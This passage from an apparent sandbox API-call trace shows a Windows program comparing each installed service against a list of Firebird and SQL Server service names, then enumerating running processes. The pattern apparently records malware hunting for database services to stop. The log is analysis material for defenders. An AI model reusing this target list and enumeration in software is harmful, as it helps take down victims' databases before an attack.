lpString2="DeviceAssociationService") returned 1 [0308.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0308.482] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0308.482] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0308.482] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0308.482] lstrlenW (lpString="Dhcp") returned 4 [0308.482] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0308.482] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0308.483] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0308.483] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0308.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0308.483] lstrlenW (lpString="Dnscache") returned 8 [0308.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0308.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0308.483] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0308.483] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0308.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0308.483] lstrlenW (lpString="DPS") returned 3 [0308.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0308.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0308.483] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0308.483] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0308.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0308.483] lstrlenW (lpString="DusmSvc") returned 7 [0308.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0308.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0308.483] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0308.483] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0308.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0308.483] lstrlenW (lpString="EventLog") returned 8 [0308.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0308.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0308.483] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0308.484] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0308.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0308.484] lstrlenW (lpString="EventSystem") returned 11 [0308.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0308.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0308.484] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0308.484] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0308.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0308.484] lstrlenW (lpString="FontCache") returned 9 [0308.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0308.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0308.484] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0308.484] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0308.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0308.484] lstrlenW (lpString="gpsvc") returned 5 [0308.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0308.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0308.484] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0308.484] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0308.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0308.484] lstrlenW (lpString="iphlpsvc") returned 8 [0308.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0308.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0308.484] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0308.484] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0308.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0308.485] lstrlenW (lpString="KeyIso") returned 6 [0308.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0308.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0308.485] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0308.485] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0308.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0308.485] lstrlenW (lpString="LanmanServer") returned 12 [0308.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0308.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0308.485] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0308.485] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0308.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0308.485] lstrlenW (lpString="LanmanWorkstation") returned 17 [0308.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0308.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0308.485] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0308.485] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0308.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0308.485] lstrlenW (lpString="lfsvc") returned 5 [0308.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0308.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0308.485] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0308.485] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0308.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0308.485] lstrlenW (lpString="lmhosts") returned 7 [0308.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0308.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0308.486] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0308.486] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0308.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0308.486] lstrlenW (lpString="LSM") returned 3 [0308.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0308.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0308.486] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0308.486] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0308.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0308.486] lstrlenW (lpString="MpsSvc") returned 6 [0308.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0308.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0308.486] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0308.486] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0308.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0308.486] lstrlenW (lpString="NcbService") returned 10 [0308.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0308.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0308.486] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0308.486] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0308.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0308.486] lstrlenW (lpString="netprofm") returned 8 [0308.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0308.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0308.486] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0308.486] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0308.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0308.487] lstrlenW (lpString="NgcSvc") returned 6 [0308.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0308.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0308.487] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0308.487] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0308.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0308.487] lstrlenW (lpString="NlaSvc") returned 6 [0308.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0308.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0308.487] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0308.487] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0308.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0308.487] lstrlenW (lpString="nsi") returned 3 [0308.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0308.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0308.487] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0308.487] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0308.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0308.487] lstrlenW (lpString="PcaSvc") returned 6 [0308.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0308.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0308.487] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0308.487] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0308.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0308.487] lstrlenW (lpString="PlugPlay") returned 8 [0308.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0308.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0308.488] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0308.488] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0308.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0308.488] lstrlenW (lpString="Power") returned 5 [0308.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0308.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0308.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0308.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0308.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0308.488] lstrlenW (lpString="ProfSvc") returned 7 [0308.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0308.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0308.488] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0308.488] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0308.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0308.488] lstrlenW (lpString="RpcEptMapper") returned 12 [0308.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0308.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0308.488] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0308.488] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0308.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0308.488] lstrlenW (lpString="RpcSs") returned 5 [0308.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0308.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0308.488] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0308.489] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0308.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0308.489] lstrlenW (lpString="SamSs") returned 5 [0308.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0308.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0308.489] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0308.489] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0308.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0308.489] lstrlenW (lpString="Schedule") returned 8 [0308.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0308.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0308.489] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0308.489] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0308.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0308.489] lstrlenW (lpString="SecurityHealthService") returned 21 [0308.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0308.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0308.489] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0308.489] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0308.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0308.489] lstrlenW (lpString="SENS") returned 4 [0308.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0308.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0308.490] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0308.490] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0308.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0308.490] lstrlenW (lpString="ShellHWDetection") returned 16 [0308.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0308.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0308.490] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0308.490] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0308.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0308.490] lstrlenW (lpString="Spooler") returned 7 [0308.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0308.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0308.490] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0308.490] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0308.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0308.490] lstrlenW (lpString="StateRepository") returned 15 [0308.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0308.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0308.490] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0308.490] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0308.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0308.490] lstrlenW (lpString="SysMain") returned 7 [0308.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0308.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0308.490] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0308.490] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0308.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0308.491] lstrlenW (lpString="SystemEventsBroker") returned 18 [0308.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0308.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0308.491] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0308.491] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0308.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0308.491] lstrlenW (lpString="Themes") returned 6 [0308.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0308.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0308.491] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0308.491] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0308.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0308.491] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0308.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0308.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0308.491] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0308.491] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0308.491] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150d60 | out: hHeap=0x470000) returned 1 [0308.491] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x420 [0308.512] Process32FirstW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.513] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0308.514] lstrlenW (lpString="System") returned 6 [0308.514] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0308.515] lstrlenW (lpString="smss.exe") returned 8 [0308.515] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.516] lstrlenW (lpString="csrss.exe") returned 9 [0308.516] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0308.517] lstrlenW (lpString="wininit.exe") returned 11 [0308.517] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.518] lstrlenW (lpString="csrss.exe") returned 9 [0308.518] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0308.518] lstrlenW (lpString="winlogon.exe") returned 12 [0308.519] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0308.519] lstrlenW (lpString="services.exe") returned 12 [0308.520] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0308.521] lstrlenW (lpString="lsass.exe") returned 9 [0308.521] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0308.521] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0308.521] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0308.522] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0308.522] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.523] lstrlenW (lpString="svchost.exe") returned 11 [0308.523] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.524] lstrlenW (lpString="svchost.exe") returned 11 [0308.524] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0308.524] lstrlenW (lpString="dwm.exe") returned 7 [0308.524] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.525] lstrlenW (lpString="svchost.exe") returned 11 [0308.525] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.526] lstrlenW (lpString="svchost.exe") returned 11 [0308.526] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.526] lstrlenW (lpString="svchost.exe") returned 11 [0308.527] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.527] lstrlenW (lpString="svchost.exe") returned 11 [0308.527] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.528] lstrlenW (lpString="svchost.exe") returned 11 [0308.539] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.540] lstrlenW (lpString="svchost.exe") returned 11 [0308.540] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.540] lstrlenW (lpString="svchost.exe") returned 11 [0308.540] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.541] lstrlenW (lpString="svchost.exe") returned 11 [0308.541] Process32NextW (in: hSnapshot=0x420, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, 